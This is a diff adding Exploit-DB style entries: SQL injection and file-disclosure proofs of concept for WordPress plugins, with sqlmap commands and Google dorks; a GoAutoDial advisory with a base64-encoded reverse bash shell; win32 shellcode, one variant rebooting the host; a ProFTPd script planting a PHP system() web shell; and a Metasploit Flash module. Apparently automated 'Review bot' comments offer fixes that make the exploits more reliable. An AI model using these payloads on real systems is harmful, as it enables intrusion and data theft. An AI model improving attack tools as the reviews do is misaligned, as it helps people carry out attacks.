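+++ b/platforms/php/webapps/36800.txt
@@ -0,0 +1,88 @@
+######################
+
+# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
+
+# Exploit Author : Claudio Viviani
+
+# Website Author: http://www.homelab.it
+http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
+
+
+# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
+
+# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
+
+# Dork Google: inurl:nex-forms-express-wp-form-builder
+# index of nex-forms-express-wp-form-builder
+
+# Date : 2015-03-29
+
+# Tested on : Windows 7 / Mozilla Firefox
+# Linux / Mozilla Firefox
+
+######################
+
+# Info:
+
+The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
+
+"nex_forms_Id" var is not sanitized
+
+# PoC Exploit:
+
+http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
+
+# Poc Video:
+
+http://youtu.be/04G08Cbrx1I
+
+# PoC sqlmap:
+
+sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
+
+[23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
+[23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
+for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
+[23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+[23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+[23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
+[23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
+GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
+sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
+---
+Parameter: nex_forms_Id (GET)
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
+---
+[23:16:34] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux CentOS 5.10
+web application technology: PHP 5.3.3, Apache 2.2.3
+back-end DBMS: MySQL 5.0.12
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2015-03-29: Discovered vulnerability
+2015-04-16: Vendor Notification
+2015-04-17: Vendor Response/Feedback
+2015-04-21: Vendor Send Fix/Patch (same version number)
+2015-04-21: Public Disclosure
+
+#####################
+
+Discovered By : Claudio Viviani
+http://www.homelab.it
+http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
+http://ffhd.homelab.it (Free Fuzzy Hashes Database)
+
+info@homelab.it
+homelabit@protonmail.ch
+
+https://www.facebook.com/homelabit
+https://twitter.com/homelabit
+https://plus.google.com/+HomelabIt1/
+https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################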
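--- a/platforms/php/webapps/36801.txt
+++ b/platforms/php/webapps/36801.txt
@@ -0,0 +1,47 @@
+######################
+
+# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download
+
+# Exploit Author : Dadou Dz
+
+# Software Link : Premium
+
+# Dork Google: inurl:com_miwoftp
+
+# Affected version: 1.0.5
+
+# Vendor Homepage:
+http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
+
+
+# Date : 2015-04-20
+
+# Tested on : Windows 7 / Mozilla Firefox
+# Linux / Mozilla Firefox
+######################
+
+# Exploit:
+http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
+"download_file" : wp-config.php
+http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
+
+
+
+#####################
+
+Discovered By : Dadou Dz
+My Email - dadoudzdz@gmail.com
+fb: fb.com/Dz2Team
+[ Thanks To ]
+Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi
+
+Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team
+
+AnonGhost Team - Anonymous Dz - Backup Sec Dz
+
+Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
+dz-root.com
+
+And All My Freinds - All Muslims Hackers - All Algerian Hackers
+
+#####################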
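--- a/platforms/php/webapps/36802.txt
+++ b/platforms/php/webapps/36802.txt
@@ -0,0 +1,72 @@
+=======================================================================
+title: SQL Injection
+product: WordPress Tune Library Plugin
+vulnerable version: 1.5.4 (and probably below)
+fixed version: 1.5.5
+CVE number: CVE-2015-3314
+impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
+homepage: https://wordpress.org/plugins/tune-library/
+found: 2015-01-09
+by: Hannes Trunde
+
+mail: hannes.trunde@gmail.com
+twitter: @hannestrunde
+
+=======================================================================
+
+
+Plugin description:
+-------------------
+"This plugin is used to import an XML iTunes Music Library file into your
+WordPress database. Once imported, you can display a complete listing of your
+music collection on a page of your WordPress site."
+
+Source: https://wordpress.org/plugins/tune-library/
+
+
+Recommendation:
+---------------
+The author has provided a fixed plugin version which should be installed
+immediately.
+
+
+Vulnerability overview/description:
+-----------------------------------
+Because of insufficient input validation, a sql injection attack can be
+performed when sorting artists by letter.
+
+However, special conditions must be met in order to exploit this vulnerability:
+1) The wordpress security feature wp_magic_quotes(), which is enabled by
+default, has to be disabled.
+2) The plugin specific option "Filter artists by letter and show alphabetical
+navigation" has to be enabled.
+
+
+Proof of concept:
+-----------------
+The following HTTP request to the Tune Library page returns version, current
+user and db name:
+===============================================================================
+http://www.site.com/?page_id=2&artistletter=G' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
+===============================================================================
+
+
+Contact timeline:
+------------------------
+2015-04-08: Contacting author via mail.
+2015-04-09: Author replies and announces a fix within a week.
+2015-04-12: Mail from author, stating that plugin has been updated.
+2015-04-14: Requesting CVE via post to the open source software security mailing
+list: http://openwall.com/lists/oss-security/2015/04/14/5
+2015-04-20: Release of security advisory.
+
+
+Solution:
+---------
+Update to the most recent plugin version.
+
+
+Workaround:
+-----------
+Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by
+letter..." option.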
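--- a/platforms/php/webapps/36804.pl
+++ b/platforms/php/webapps/36804.pl
@@ -0,0 +1,110 @@
+.__ _____ _______
+| |__ / | |___ __\ _ \_______ ____
+| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
+| \/ ^ /> <\ \_/ \ | \/\ ___/
+|___| /\____ |/__/\_ \\_____ /__| \___ >
+\/ |__| \/ \/ \/
+_____________________________
+/ _____/\_ _____/\_ ___ \
+\_____ \ | __)_ / \ \/ http://twitter.com/h4SEC
+/ \ | \\ \____ Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y
+/_______ //_______ / \______ /
+~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+[+] Author : KnocKout
+[~] E-Mail : knockout@e-mail.com.tr
+[~] Twitter: http://twitter.com/h4SEC
+[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org
+[~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members.
+~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+|~Web App. : MediaSuite CMS - Artibary File Disclosure Exploit
+|~Price : N/A
+|~Version : All CMS
+|~Software: http://www.mediasuite.ca
+|~Vulnerability Style : File Disclosure
+|~Vulnerability Dir : /
+|~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario"
+|[~]Date : "20.04.2015"
+|[~]Exploit Tested on : >>>> www.mediasuite.ca ( Official Web ) <<<<<
+----------------------------------------------------------
+---------------------Info;--------------------------------
+----------------------------------------------------------
+can be easily found in any database password for this "site-settings.php" will be sufficient to read
+possible to read the file on the local database.
+incorrect coding and unconscious in it causing ""force-download.php"" file.
+that's laughter reason codes:)
+
+##################################################################################################
+file in "force-download.php"
+..
+..
+..
+$type = $_GET['type'];
+$file = $_GET['file'];
+
+if($type == "1"){
+$filename = "../uploads/$file";
+}
+..
+..
+..
+}
+header("Pragma: public"); // required
+header("Expires: 0");
+header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+header("Cache-Control: private",false); // required for certain browsers
+header("Content-Type: $ctype");
+// change, added quotes to allow spaces in filenames, by Rajkumar Singh
+header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: ".filesize($filename));
+readfile("$filename");
+exit();
+..
+...
+
+##################################################################################################
+##############################Exploit.pl#########################################################
+##################################################################################################
+
+use LWP::Simple;
+use LWP::UserAgent;
+system('cls');
+system('title MediaSuite CMS - Artibary File Disclosure Exploit');
+system('color 2');
+if(@ARGV < 2)
+{
+print "[-]Su Sekilde Kocum. \n\n";
+&help; exit();
+}
+sub help()
+{
+print "[+] Usaqe : perl $0 Target /path/ \n";
+print "[+] Usage : perl $0 localhost / \n";
+}
+print "\n************************************************************************\n";
+print "\* MediaSuite CMS - Artibary File Disclosure Exploit *\n";
+print "\* Exploit coded by : KnocKout *\n";
+print "\* Contact : twitter.com/h4SEC *\n";
+print "\* -- *\n";
+print "\*********************************************************************\n\n\n";
+($TargetIP, $path, $File,) = @ARGV;
+$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
+my $url = "http://" . $TargetIP . $path . $File;
+print "\n Biraz Bekle. \n\n";
+my $useragent = LWP::UserAgent->new();
+my $request = $useragent->get($url,":content_file" => "site-settings.php");
+if ($request->is_success)
+{
+print "[+] Exploit Basarili, kodlayanin eline saglik \n\n";
+print "[+] Exploit Basarili. !\n";
+print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. \n";
+print "[+] h4 SEC \n";
+print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker
+\n";
+exit();
+}
+else
+{
+print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
+exit();
+}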
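--- a/platforms/php/webapps/36805.txt
+++ b/platforms/php/webapps/36805.txt
@@ -0,0 +1,80 @@
+=======================================================================
+title: SQL Injection
+product: WordPress Community Events Plugin
+vulnerable version: 1.3.5 (and probably below)
+fixed version: 1.4
+CVE number: CVE-2015-3313
+impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+homepage: https://wordpress.org/plugins/community-events/
+found: 2015-01-07
+by: Hannes Trunde
+
+mail: hannes.trunde@gmail.com
+twitter: @hannestrunde
+
+=======================================================================
+
+
+Plugin description:
+-------------------
+"The purpose of this plugin is to allow users to create a schedule of upcoming
+events and display events for the next 7 days in an AJAX-driven box or
+displaying a full list of upcoming events."
+
+Source: https://wordpress.org/plugins/community-events/
+
+
+Recommendation:
+---------------
+The author has provided a fixed plugin version which should be installed
+immediately.
+
+
+Vulnerability overview/description:
+-----------------------------------
+Because of insufficient input validation, a blind SQL injection attack can be
+performed within the search function to obtain sensitive information from the
+database. To exploit this vulnerability, there has to be at least one planned
+event on the calendar.
+
+
+Proof of concept:
+-----------------
+The following HTTP request to the Community Events full schedule returns the
+event(s) planned in the specified year:
+===============================================================================
+http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
+===============================================================================
+
+The following HTTP request returns a blank page, thus confirming the blind SQL
+injection vulnerability:
+===============================================================================
+http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
+===============================================================================
+
+Obtaining users and password hashes with sqlmap may look as follows (--string
+parameter has to contain (part of) the name of the event, enabling sqlmap to
+differentiate between true and false statements):
+================================================================================
+sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
+================================================================================
+
+
+Contact timeline:
+-----------------
+2015-04-08: Contacting author via mail.
+2015-04-09: Author replies and announces a fix within a week.
+2015-04-12: Mail from author, stating that plugin has been updated.
+2015-04-14: Posting information to the open source software security mailing
+list: http://openwall.com/lists/oss-security/2015/04/14/5
+2015-04-18: Release of security advisory.
+
+
+Solution:
+---------
+Update to the most recent plugin version.
+
+
+Workaround:
+-----------
+See solution.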
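--- a/platforms/php/webapps/36807.txt
+++ b/platforms/php/webapps/36807.txt
@@ -0,0 +1,73 @@
+Affected software: GoAutoDial
+Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
+Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
+Vendor advisory: http://goautodial.org/news/21
+
+Abstract:
+Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.
+
+Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
+Refer to the product changelog.txt: https://github.com/goautodial/ce-www/blob/master/changelog.txt
+
+==================================
+1/ CVE-2015-2843
+- SQLi authentication bypass due to lack of input sanitisation
+Affected file: go_login.php
+Issue: Lack of input sanitisation on input parameters user_name and user_pass prior to being handled by the database.
+
+A simple 'OR '1'='1 in the password field with a username of 'admin' will log you in. (assuming the default administrator user has not been removed).
+You can also test this by performing the following GET request:
+
+PoC:
+https://<ip>/go_login/validate_credentials/admin/' OR '1'='1
+
+- SQLi within the 'go_get_user_info' function
+Affected file: go_site.php
+Issue: Lack of input sanitisation on input parameters being handled by the database
+
+This function returns a single entry from the db that contains user information including the username and password.
+Given that the first 'active' user in the db would most likely be the admin user you can search for active=Y. There is a column in the vicidial_users table that identifies whether a user is active (Y) or not active (N).
+Given this, you can perform the following to return an admin user's account username and password.
+
+PoC:
+https://<ip>/index.php/go_site/go_get_user_info/' or active='Y
+
+==================================
+2/ CVE-2015-2842
+- Arbitrary file upload within the 'audiostore' upload functionality
+Affected file: go_audiostore.php
+Issue: Filename extensions are not properly checked to ensure only 'audio' files can be uploaded
+
+A user can upload a file with the filename 'bogus.wav.php'. The filename is checked for the '.wav' extension and the check is passed, however with the trailing '.php' file extension, much fun is obtained.
+An uploaded file is moved to a symlinked directory (/var/lib/asterisk/sounds) of which can be viewed directly from the browser.
+Note*: All user uploaded files are given the 'go_' prefix. This example ends up with 'go_bogus.wav.php' as an uploaded file.
+
+https://<ip>/sounds/go_bogus.wav.php
+** Pop goes the shell **
+
+==================================
+3/ CVE-2015-2844 and CVE-2015-2845
+- Arbitrary command injection via the cpanel function due to lack of input sanitisation
+Affected file: go_site.php
+Issue: User supplied parameters are passed to the php 'exec' function, of which the intended function can be escaped to do more sinister things.
+
+Two variables are passed to the underlying exec command, $action and $type. Either one can be used.
+URI looks like this: https://<ip>/index.php/go_site/cpanel/$type/$action
+
+Affected code: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'");
+
+Base64 encoding bypasses any web server encoding and a lovely root shell is obtained.
+** pop goes a root shell **
+reverse bash shell one liner: bash -i >& /dev/tcp/192.168.0.11/4444 0>&1
+
+PoC:
+https://<ip>/index.php/go_site/cpanel/|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"
+
+==================================
+Vulnerability Remediation
+
+Upgrade to version 3.3-1421902800 at a minimum.
+As per the vendor advisory, follow the instructions provided in the link below.
+http://goautodial.org/projects/goautodialce/wiki/GIThub
+
+Metasploit module to be created at some point though quick and dirty python scripts work just fine too...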
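--- a/platforms/win32/shellcode/36779.c
+++ b/platforms/win32/shellcode/36779.c
@@ -0,0 +1,50 @@
+/*
+#[+] Author: TUNISIAN CYBER
+#[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes)
+#[+] Date: 15-04-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp 32bit SP3
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Credits: steve hanna
+projectshellcode.com
+=============================
+Assembly:
+
+;create.asm
+[Section .text]
+
+BITS 32
+
+global _start
+
+_start:
+
+jmp short GetCommand
+CommandReturn:
+pop ebx
+
+xor eax,eax
+push eax
+push ebx
+mov ebx,0x7c8623ad
+call ebx
+
+xor eax,eax
+push eax
+mov ebx, 0x7c81cafa
+call ebx
+
+GetCommand:
+call CommandReturn
+db "cmd.exe /C echo shellcode by tunisian cyber >file.txt"
+db 0x00
+=============================
+*/
+char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff"
+"\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
+"\x65\x20\x2f\x43\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79"
+"\x20\x74\x75\x6e\x69\x73\x69\x61\x6e\x20\x63\x79\x62\x65\x72\x20\x3e\x66\x69\x6c\x65\x2e\x74\x78\x74\x00";
+
+
+int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}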
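Review bot: The `mov ebx,0x7c8623ad` and `mov ebx, 0x7c81cafa` lines call kernel32 through absolute addresses, so the payload only works on the exact XP SP3 kernel32.dll the header says it was tested on (presumably WinExec and ExitProcess, given the `push eax`/`push ebx` argument setup); on any other build, or under ASLR, `call ebx` lands on unrelated code. The listing should say so next to the first address, e.g. `; kernel32!WinExec — XP SP3-specific absolute address, not portable; resolve dynamically for other builds`. Two further caveats deserve a comment: the byte string ends in `\x00` (the `db 0x00` terminator), so it is not null-free and cannot be delivered through a C-string copy, and the `int main` harness jumps into a writable data array, which runs only with DEP disabled or the data section marked executable.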
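--- a/platforms/win32/shellcode/36780.c
+++ b/platforms/win32/shellcode/36780.c
@@ -0,0 +1,50 @@
+/*
+#[+] Author: TUNISIAN CYBER
+#[+] Title: Shellcode: win32/xp sp3 Restart computer
+#[+] Date: 16-04-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp 32bit SP3
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Credits: steve hanna
+projectshellcode.com
+=============================
+Assembly:
+
+;create.asm
+[Section .text]
+
+BITS 32
+
+global _start
+
+_start:
+
+jmp short GetCommand
+CommandReturn:
+pop ebx
+
+xor eax,eax
+push eax
+push ebx
+mov ebx,0x7c8623ad
+call ebx
+
+xor eax,eax
+push eax
+mov ebx, 0x7c81cafa
+call ebx
+
+GetCommand:
+call CommandReturn
+db "cmd.exe /C shutdown /r /t 0"
+db 0x00
+=============================
+*/
+char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
+"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x43\x20"
+"\x73\x68\x75\x74\x64\x6f\x77\x6e\x20\x2f\x72\x20\x2f\x74\x20\x30\x00";
+
+
+
+int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}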
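Review bot: The `int main` harness executes `cmd.exe /C shutdown /r /t 0` the moment it is run, rebooting the host with no prompt, yet nothing in the file says so; a line such as `/* WARNING: running this test harness reboots the machine immediately */` above `main` is warranted. The assembly header still reads `;create.asm`, carried over from the file-creation variant, and the title omits the byte count the sibling listing gives. As in that listing, the two `mov ebx,0x7c...` call targets are absolute XP SP3 kernel32 addresses, so the bytes are not portable to any other kernel32 build and the comment should state that.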
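--- a/platforms/windows/remote/36803.py
+++ b/platforms/windows/remote/36803.py
@@ -0,0 +1,47 @@
+# Title: ProFTPd 1.3.5 Remote Command Execution
+# Date : 20/04/2015
+# Author: R-73eN
+# Software: ProFTPd 1.3.5 with mod_copy
+# Tested : Kali Linux 1.06
+# CVE : 2015-3306
+# Greetz to Vadim Melihow for all the hard work .
+import socket
+import sys
+import requests
+#Banner
+banner = ""
+banner += " ___ __ ____ _ _ \n"
+banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
+banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
+banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
+banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
+print banner
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+if(len(sys.argv) < 4):
+print '\n Usage : exploit.py server directory cmd'
+else:
+server = sys.argv[1] #Vulnerable Server
+directory = sys.argv[2] # Path accessible from web .....
+cmd = sys.argv[3] #PHP payload to be executed
+evil = '<?php system("' + cmd + '") ?>'
+s.connect((server, 21))
+s.recv(1024)
+print '[ + ] Connected to server [ + ] \n'
+s.send('site cpfr /etc/passwd')
+s.recv(1024)
+s.send('site cpto ' + evil)
+s.recv(1024)
+s.send('site cpfr /proc/self/fd/3')
+s.recv(1024)
+s.send('site cpto ' + directory + 'infogen.php')
+s.recv(1024)
+s.close()
+print '[ + ] Payload sended [ + ]\n'
+print '[ + ] Executing Payload [ + ]\n'
+r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
+if (r.status_code == 200):
+print '[ * ] Payload Executed Succesfully [ * ]'
+else:
+print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
+
+print '\n http://infogen.al/'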
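Review bot: None of the four `s.send('site ...')` calls terminates the command with `\r\n`, and an FTP server does not act on a command until it sees the line terminator, so the `s.recv(1024)` after the first `cpfr` is likely to block until the server's idle timeout instead of returning a reply; every command needs a CRLF, and `sendall` rather than `send`, which may write short. A small helper keeps that in one place, shown below. Separately, the success check fetches `'http://' + server + '/infogen.php'` at the web root while the file was written to `directory + 'infogen.php'`, so the 200/not-200 verdict is only meaningful when `directory` is the document root; deriving the URL path from the same argument, or taking a separate web path, would make the check honest.
```python
def ftp_cmd(sock, line):
    # RFC 959: each command is CRLF-terminated; sendall avoids short writes
    sock.sendall(line + '\r\n')
    return sock.recv(1024)

# … unchanged: banner, argument parsing, connect and greeting …
ftp_cmd(s, 'site cpfr /etc/passwd')
ftp_cmd(s, 'site cpto ' + evil)
ftp_cmd(s, 'site cpfr /proc/self/fd/3')
ftp_cmd(s, 'site cpto ' + directory + 'infogen.php')
```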
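--- a/platforms/windows/remote/36808.rb
+++ b/platforms/windows/remote/36808.rb
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+
+include Msf::Exploit::Powershell
+include Msf::Exploit::Remote::BrowserExploitServer
+
+def initialize(info={})
+super(update_info(info,
+'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
+'Description' => %q{
+This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
+in the copyPixelsToByteArray method from the BitmapData object. The position field of the
+destination ByteArray can be used to cause an integer overflow and write contents out of
+the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
+IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit
+'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
+'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it
+'juan vazquez' # msf module
+],
+'References' =>
+[
+['CVE', '2014-0556'],
+['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
+['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
+['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
+['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
+['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
+],
+'Payload' =>
+{
+'DisableNops' => true
+},
+'Platform' => 'win',
+'BrowserRequirements' =>
+{
+:source => /script|headers/i,
+:os_name => OperatingSystems::Match::WINDOWS_7,
+:ua_name => Msf::HttpClients::IE,
+:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
+:arch => ARCH_X86
+},
+'Targets' =>
+[
+[ 'Automatic', {} ]
+],
+'Privileged' => false,
+'DisclosureDate' => 'Sep 23 2014',
+'DefaultTarget' => 0))
+end
+
+def exploit
+@swf = create_swf
+super
+end
+
+def on_request_exploit(cli, request, target_info)
+print_status("Request: #{request.uri}")
+
+if request.uri =~ /\.swf$/
+print_status('Sending SWF...')
+send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+return
+end
+
+print_status('Sending HTML...')
+send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+end
+
+def exploit_template(cli, target_info)
+swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+target_payload = get_payload(cli, target_info)
+psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+b64_payload = Rex::Text.encode_base64(psh_payload)
+
+html_template = %Q|<html>
+<body>
+<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+<param name="movie" value="<%=swf_random%>" />
+<param name="allowScriptAccess" value="always" />
+<param name="FlashVars" value="sh=<%=b64_payload%>" />
+<param name="Play" value="true" />
+<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+</object>
+</body>
+</html>
+|
+
+return html_template, binding()
+end
+
+def create_swf
+path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
+swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+swf
+end
+
+end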
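Review bot: In `create_swf`, `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns `swf` twice — once inside the block and once from the block's return value — and the inner assignment adds nothing; `swf = ::File.binread(path)` reads the file in binary mode in a single expression. Further up, `request.uri =~ /\.swf$/` uses `$`, which in Ruby anchors at a line end rather than the end of the string; `\z` is the whole-string anchor, though a request URI is unlikely to carry a newline, so this is style rather than a live bug. The `:flash` requirement hard-codes `14.0.0.176` as the upper bound with no explanation; a comment such as `# 14.0.0.176 is the last 14.x build tested vulnerable; APSB14-21 lists the fixed release — confirm` would spare the next maintainer a lookup.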